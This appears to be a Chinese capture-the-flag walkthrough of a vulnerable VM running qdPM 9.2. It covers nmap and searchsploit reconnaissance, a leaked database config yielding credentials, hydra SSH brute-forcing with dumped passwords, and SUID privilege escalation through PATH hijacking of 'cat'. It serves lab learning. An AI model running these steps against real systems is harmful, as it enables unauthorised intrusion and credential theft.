我们还是使用 kali 中的 arp-scan -l 查询靶机 ip
靶机 ip:192.168.75.129
第一步 信息收集
nmap -sS 192.168.75.129
![](https://i-blog.csdnimg.cn/img_convert/1e10a15ce5784ea61c43ac2672827e55.png)
访问网站
![](https://i-blog.csdnimg.cn/img_convert/0993afa6646bd22d225745517d6dbbf2.png)
这个是一个web应用,框架是qdpm 9.2
在kali上搜索一下发现有两个漏洞,依次看一下
searchsploit qdpm 9.2
![](https://i-blog.csdnimg.cn/img_convert/bd4a0942028e1d22349266e05736b861.png)
1.locate 50854.txt
cat /usr/share/exploitdb/exploits/php/webapps/50854.txt
![](https://i-blog.csdnimg.cn/img_convert/df3d2996f6ebfe451490843259e25499.png)
这个是一个csrf的html文件
2.50176.txt
![](https://i-blog.csdnimg.cn/img_convert/dc7c7a6662b0732f1b112ffe76e82f23.png)
数据库的密码和连接字符串存储在yml文件中。
访问地址:/core/config/databases.ym
第二步 漏洞利用
访问地址后下载下来一个文件
![](https://i-blog.csdnimg.cn/img_convert/738f8f9b4d82812f8f9a322046aa7ef7.png)
进行连接数据库,用户名qdpmadmin;密码:UcVQCMQk2STVeS6J
我们去连接数据库
mysql -u qdpmadmin -h 192.168.47.135 -p
![](https://i-blog.csdnimg.cn/img_convert/b852eac19f0d1789cd83578f327cb706.png)
![](https://i-blog.csdnimg.cn/img_convert/7a569241322bffa9a0161f97cceaaefc.png)
在staff这个数据库有三张表
![](https://i-blog.csdnimg.cn/img_convert/288a1cc09c3d08c52cbd9cc87a91a89c.png)
![](https://i-blog.csdnimg.cn/img_convert/96f21ad3562e15edc94e68dce9c86e0e.png)
#user表中都是用户名
Smith
ucas
Travis
Dexter
Meyer
#login表中都是base64加密
c3VSSkFkR3dMcDhkeTNyRg==
N1p3VjRxdGc0MmNtVVhHWA==
WDdNUWtQM1cyOWZld0hkQw==
REpjZVZ5OThXMjhZN3dMZw==
Y3FObkJXQ0J5UzJEdUpTeQ==
#解密
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
DJceVy98W28Y7wLg
cqNnBWCByS2DuJSy
爆破一下靶机的ssh
user和passwd做成一个文件
hydra -L user -P passwd ssh://192.168.47.135
在这里用户名首字母都是大写;我们要给他换成小写;要不会爆不出来
![](https://i-blog.csdnimg.cn/img_convert/686529b6873187204e810b5c38d3a6bf.png)
使用ssh去连接;获取flag
![](https://i-blog.csdnimg.cn/img_convert/7979301ce96fe50d8c764ec215335e4f.png)
第三步 提权
切换用户dexter
![](https://i-blog.csdnimg.cn/img_convert/04dcc6e6dd1292aeb2e7dda65d531d0b.png)
查看了一下note.txt
![](https://i-blog.csdnimg.cn/img_convert/d8654f05b0729814b18cf16478bf6314.png)
文件给了提示需要suid提权
#查找具有SetUID权限的文件的命令
find / -perm -4000 2>/dev/null
![](https://i-blog.csdnimg.cn/img_convert/959311f808db96429006d19f913933e4.png)
使用strings命令查看一下get_access
![](https://i-blog.csdnimg.cn/img_convert/8a090f06d171ba269c71b851a710ad3e.png)
发现cat命令提权
配置环境变量
echo "/bin/bash" > /tmp/cat
export PATH=/tmp:$PATH
chmod +x /tmp/cat
ehco $PATH
/opt/get_access
![](https://i-blog.csdnimg.cn/img_convert/19186f864b82125eab925bb711be7c15.png)